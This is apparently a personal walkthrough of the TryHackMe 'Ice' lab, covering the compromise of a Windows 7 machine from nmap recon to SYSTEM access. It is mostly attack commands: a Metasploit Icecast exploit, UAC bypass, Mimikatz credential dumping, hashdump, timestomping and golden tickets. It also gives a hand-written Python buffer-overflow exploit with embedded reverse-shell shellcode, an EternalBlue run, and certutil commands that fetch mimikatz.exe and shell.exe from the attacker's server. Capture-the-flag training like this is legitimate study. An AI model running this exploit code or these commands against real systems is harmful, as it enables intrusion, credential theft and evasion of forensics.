TryHackMe: Ice

[Task 2] Recon

1. Deploy the machine! This may take up to three minutes to start.
2. Launch a scan against our target machine, I recommend using a SYN scan set to scan all ports on the machine. The scan command will be provided as a hint, however, it’s recommended to complete the room ‘RP: Nmap’ prior to this room.

Port scan

nmap -Pn <ip>

Syn scan

nmap -sS <ip>

OS detection, version detection, script scanning, and traceroute

nmap -A <ip>

This machine uses Windows 7

Vulnerability scan

nmap --script vuln <ip>

Samba scan

nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse <ip>

3. Once the scan completes, we’ll see a number of interesting ports open on this machine. As you might have guessed, the firewall has been disabled (with the service completely shutdown), leaving very little to protect this machine. One of the more interesting ports that is open is Microsoft Remote Desktop (MSRDP). What port is this open on?
ANS: It’s in #2.

4. What service did nmap identify as running on port 8000? (First word of this service)
ANS: It’s in #2.

5. What does Nmap identify as the hostname of the machine? (All caps for the answer)
ANS: It’s in #2.

[Task 3] Gain Access

1. Now that we’ve identified some interesting services running on our target machine, let’s do a little bit of research into one of the weirder services identified: Icecast. Icecast, or well at least this version running on our target, is heavily flawed and has a high level vulnerability with a score of 7.5 (7.4 depending on where you view it). What type of vulnerability is it? Use https://www.cvedetails.com for this question and the next.

I use exploit-db.

https://exploit-db.com

Search Icecast, select one with metasploit.

Access cve details

https://www.cvedetails.com

2. What is the CVE number for this vulnerability? This will be in the format: CVE-0000–0000
ANS: It’s in #1.

3. Now that we’ve found our vulnerability, let’s find our exploit. For this section of the room, we’ll use the Metasploit module associated with this exploit. Let’s go ahead and start Metasploit using the command `msfconsole`

msfconsole

4. After Metasploit has started, let’s search for our target exploit using the command ‘search icecast’. What is the full path (starting with exploit) for the exploitation module? This module is also referenced in ‘RP: Metasploit’ which is recommended to be completed prior to this room, although not entirely necessary.

search 2004-1561

5. Let’s go ahead and select this module for use. Type either the command `use icecast` or `use 0` to select our search result.

use 0

6. Following selecting our module, we now have to check what options we have to set. Run the command `show options`. What is the only required setting which currently is blank?

7. Let’s set that last option to our target IP. Now that we have everything ready to go, let’s run our exploit using the command `exploit`

set RHOSTS <victim ip>
exploit

[Task 4] Escalate

1. Woohoo! We’ve gained a foothold into our victim machine! What’s the name of the shell we have now?
   ANS: meter******
2. What user was running that Icecast process? The commands used in this question and the next few are taken directly from the ‘RP: Metasploit’ room.

ps

3. What build of Windows is the system?

sysinfo

4. Now that we know some of the finer details of the system we are working with, let’s start escalating our privileges. First, what is the architecture of the process we’re running?
ANS: It’s in #3.

5. Now that we know the architecture of the process, let’s perform some further recon. While this doesn’t work the best on x64 machines, let’s now run the following command `run post/multi/recon/local_exploit_suggester`. *This can appear to hang as it tests exploits and might take several minutes to complete*

At first, I used “getsystem” to escalate my privilege. It wasn’t work though.

getsystem

I have to find other exploits.

run post/multi/recon/local_exploit_suggester

6. Running the local exploit suggester will return quite a few results for potential escalation exploits. What is the full path (starting with exploit/) for the first returned exploit?
ANS: It’s in #5.

7. Now that we have an exploit in mind for elevating our privileges, let’s background our current session using the command `background` or `CTRL + z`. Take note of what session number we have, this will likely be 1 in this case. We can list all of our active sessions using the command `sessions` when outside of the meterpreter shell.

background
sessions

8. Go ahead and select our previously found local exploit for use using the command `use FULL_PATH_FOR_EXPLOIT`

use exploit/windows/local/bypassuac_eventvwr
show options

9. Local exploits require a session to be selected (something we can verify with the command `show options`), set this now using the command `set session SESSION_NUMBER`

set session <number>
run

It failed.

10. Now that we’ve set our session number, further options will be revealed in the options menu. We’ll have to set one more as our listener IP isn’t correct. What is the name of this option?

show options

11. Set this option now. You might have to check your IP on the TryHackMe network using the command `ip addr`

ip addr

12. After we’ve set this last option, we can now run our privilege escalation exploit. Run this now using the command `run`. Note, this might take a few attempts and you may need to relaunch the box and exploit the service in the case that this fails.

set LHOST <attacker ip>
run -j

13. Following completion of the privilege escalation a new session will be opened. Interact with it now using the command `sessions SESSION_NUMBER`

sessions
session 2

14. We can now verify that we have expanded permissions using the command `getprivs`. What permission listed allows us to take ownership of files?

getprivs

[Task 5] Looting

1. Prior to further action, we need to move to a process that actually has the permissions that we need to interact with the lsass service, the service responsible for authentication within Windows. First, let’s list the processes using the command `ps`. Note, we can see processes being run by NT AUTHORITY\SYSTEM as we have escalated permissions (even though our process doesn’t).

ps

2. In order to interact with lsass we need to be ‘living in’ a process that is the same architecture as the lsass service (x64 in the case of this machine) and a process that has the same permissions as lsass. The printer spool service happens to meet our needs perfectly for this and it’ll restart if we crash it! What’s the name of the printer service?

Mentioned within this question is the term ‘living in’ a process. Often when we take over a running program we ultimately load another shared library into the program (a dll) which includes our malicious code. From this, we can spawn a new thread that hosts our shell.
ANS: spool**.***

3. Migrate to this process now with the command `migrate -N PROCESS_NAME`

migrate -N spoolsv.exe

4. Let’s check what user we are now with the command `getuid`. What user is listed?

getuid

5. Now that we’ve made our way to full administrator permissions we’ll set our sights on looting. Mimikatz is a rather infamous password dumping tool that is incredibly useful. Load it now using the command `load kiwi` (Kiwi is the updated version of Mimikatz)

load kiwi

6. Loading kiwi into our meterpreter session will expand our help menu, take a look at the newly added section of the help menu now via the command `help`.

help

7. Which command allows up to retrieve all credentials?
ANS: creds******

8. Run this command now. What is Dark’s password? Mimikatz allows us to steal this password out of memory even without the user ‘Dark’ logged in as there is a scheduled task that runs the Icecast as the user ‘Dark’. It also helps that Windows Defender isn’t running on the box ;) (Take a look again at the ps list, this box isn’t in the best shape with both the firewall and defender disabled)

creds_all

[Task 6] Post-Exploitation

1. Before we start our post-exploitation, let’s revisit the help menu one last time in the meterpreter shell. We’ll answer the following questions using that menu.

help

2. What command allows us to dump all of the password hashes stored on the system? We won’t crack the Administrative password in this case as it’s pretty strong (this is intentional to avoid password spraying attempts)

hashdump

2. While more useful when interacting with a machine being used, what command allows us to watch the remote user’s desktop in real time?

screenshare

3. How about if we wanted to record from a microphone attached to the system?

record_mic

4. To complicate forensics efforts we can modify timestamps of files on the system. What command allows us to do this? Don’t ever do this on a pentest unless you’re explicitly allowed to do so! This is not beneficial to the defending team as they try to breakdown the events of the pentest after the fact.

timestop <path>

5. Mimikatz allows us to create what’s called a `golden ticket`, allowing us to authenticate anywhere with ease. What command allows us to do this?

Golden ticket attacks are a function within Mimikatz which abuses a component to Kerberos (the authentication system in Windows domains), the ticket-granting ticket. In short, golden ticket attacks allow us to maintain persistence and authenticate as any user on the domain.

golden_ticket_create

8. One last thing to note. As we have the password for the user ‘Dark’ we can now authenticate to the machine and access it via remote desktop (MSRDP). As this is a workstation, we’d likely kick whatever user is signed onto it off if we connect to it, however, it’s always interesting to remote into machines and view them as their users do. If this hasn’t already been enabled, we can enable it via the following Metasploit module: `run post/windows/manage/enable_rdp`

run post/windows/manage/enable_rdp

[Task 7] Extra Credit

From enumeration step, there’s Eternal Blue that I can use. I’ll try this first and try Icecast later.

1. Eternal Blue

Reference: https://github.com/3ndG4me/AutoBlue-MS17-010

python eternalblue_checker.py <ip>

cd shellcode
./shell_prep.sh

1. would you like to auto generate a reverse shell with msfvenom? (Y/n) : Y
2. LHOST : <attacker ip>
3. LPORT x64 : 8888
4. LPORT x86 : 9999
5. Type 0 to generate a meterpreter shell or 1 to generate a regular cmd shell : 1
6. Type 0 to generate a staged payload or 1 to generate a stageless payload : 1

Create listener

nc -lvp 8888
nc -lvp 9999

Run exploit

python eternalblue_exploit7.py <ip> shellcode/sc_all.bin

I had to run the script about 5 times to get the shell

whoami

Upload mimikatz.exe, back to attacker machine

python -m SimpleHTTPServer 80

At victim machine, download mimikatz.exe

certutil.exe -urlcache -f http://<ip>/mimikatz.exe mimikatz.exe

mimikatz.exe

lsadump::sam

Crack with crackstation

RDP with remmina

2. Icecast

Exploit link: https://www.exploit-db.com/exploits/568

I tried to compile the C code, but I couldn’t. I will convert metasploit module to python instead.

Reference of converting method: https://netsec.ws/?p=262

My python code, Download link: https://github.com/ratiros01/TryHackMe-Ice/blob/master/icecast.py

#CVE-2004-1561
import sys
import socket
#usage python ice.py <rhost> <rport>
rhost = sys.argv[1]
rport = int(sys.argv[2])
#msfvenom -p windows/shell_reverse_tcp LHOST=10.4.0.225 LPORT=1234 -e x86/shikata_ga_nai -b '\x0d\x0a\x00' -s 2000 -f python
buf =  ""
buf += "\xbd\x38\xdf\xbc\xb6\xdb\xc2\xd9\x74\x24\xf4\x5a\x31"
buf += "\xc9\xb1\x52\x83\xea\xfc\x31\x6a\x0e\x03\x52\xd1\x5e"
buf += "\x43\x5e\x05\x1c\xac\x9e\xd6\x41\x24\x7b\xe7\x41\x52"
buf += "\x08\x58\x72\x10\x5c\x55\xf9\x74\x74\xee\x8f\x50\x7b"
buf += "\x47\x25\x87\xb2\x58\x16\xfb\xd5\xda\x65\x28\x35\xe2"
buf += "\xa5\x3d\x34\x23\xdb\xcc\x64\xfc\x97\x63\x98\x89\xe2"
buf += "\xbf\x13\xc1\xe3\xc7\xc0\x92\x02\xe9\x57\xa8\x5c\x29"
buf += "\x56\x7d\xd5\x60\x40\x62\xd0\x3b\xfb\x50\xae\xbd\x2d"
buf += "\xa9\x4f\x11\x10\x05\xa2\x6b\x55\xa2\x5d\x1e\xaf\xd0"
buf += "\xe0\x19\x74\xaa\x3e\xaf\x6e\x0c\xb4\x17\x4a\xac\x19"
buf += "\xc1\x19\xa2\xd6\x85\x45\xa7\xe9\x4a\xfe\xd3\x62\x6d"
buf += "\xd0\x55\x30\x4a\xf4\x3e\xe2\xf3\xad\x9a\x45\x0b\xad"
buf += "\x44\x39\xa9\xa6\x69\x2e\xc0\xe5\xe5\x83\xe9\x15\xf6"
buf += "\x8b\x7a\x66\xc4\x14\xd1\xe0\x64\xdc\xff\xf7\x8b\xf7"
buf += "\xb8\x67\x72\xf8\xb8\xae\xb1\xac\xe8\xd8\x10\xcd\x62"
buf += "\x18\x9c\x18\x24\x48\x32\xf3\x85\x38\xf2\xa3\x6d\x52"
buf += "\xfd\x9c\x8e\x5d\xd7\xb4\x25\xa4\xb0\xb0\xbd\xa6\xa1"
buf += "\xad\xbf\xa6\x25\xfc\x49\x40\x4f\x10\x1c\xdb\xf8\x89"
buf += "\x05\x97\x99\x56\x90\xd2\x9a\xdd\x17\x23\x54\x16\x5d"
buf += "\x37\x01\xd6\x28\x65\x84\xe9\x86\x01\x4a\x7b\x4d\xd1"
buf += "\x05\x60\xda\x86\x42\x56\x13\x42\x7f\xc1\x8d\x70\x82"
buf += "\x97\xf6\x30\x59\x64\xf8\xb9\x2c\xd0\xde\xa9\xe8\xd9"
buf += "\x5a\x9d\xa4\x8f\x34\x4b\x03\x66\xf7\x25\xdd\xd5\x51"
buf += "\xa1\x98\x15\x62\xb7\xa4\x73\x14\x57\x14\x2a\x61\x68"
buf += "\x99\xba\x65\x11\xc7\x5a\x89\xc8\x43\x6a\xc0\x50\xe5"
buf += "\xe3\x8d\x01\xb7\x69\x2e\xfc\xf4\x97\xad\xf4\x84\x63"
buf += "\xad\x7d\x80\x28\x69\x6e\xf8\x21\x1c\x90\xaf\x42\x35"
evul = "\xeb\x0c / HTTP/1.1 "
evul += buf
evul += "\r\n"
evul += "Accept: text/html\r\n" * 31;
# jmp [esp+4]
evul += "\xff\x64\x24\x04\r\n"
evul += "\r\n"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((rhost, rport))
s.sendall(evul)
data = s.recv(1024)
s.close()
print 'Received', repr(data)

Create listener

nc -lvp 1234

Run the exploit

python ice.py <target IP> <target Port>

Back to listener, now I have shell

whoami

It’s not “nt authority/system” yet. I have to escalate my privilege.

List users on the machine

net user

Get system data, this machine is win7-x64

systeminfo

Save results in a file

Use exploit suggester
Reference: https://github.com/AonCyberLabs/Windows-Exploit-Suggester

python windows-exploit-suggester.py --database <database file> --systeminfo <systeminfo file> > <destination file>

Open the file. I have to use exploit with [E] , because I’ll do the manual exploitation.

Let’s start kernel exploit

1. ms14–058
   Reference: https://github.com/SecWiki/windows-kernel-exploits/blob/master/MS14-058/CVE-2014-4113-Exploit.rar

Create another reverse shell

msfvenom -p windows/x64/shell_reverse_tcp lhost=<ip> lport=1235 -f exe -o shell.exe

Create listener

nc -lvp 1235

Create http server

python -m SimpleHTTPServer 80

Back to vimtim’s machine, download shell.exe and exploit file

certutil -urlcache -f http://10.4.0.225/shell.exe shell.exe
certutil -urlcache -f http://10.4.0.225/CVE-2014-4113-Exploit/Win64.exe Win64.exe

Follow usage example

Run the exploit

Win64.exe whoami

This exploit is worked.

Now I will run shell.exe

Win64.exe shell.exe

At port 1235 listener, now I have a shell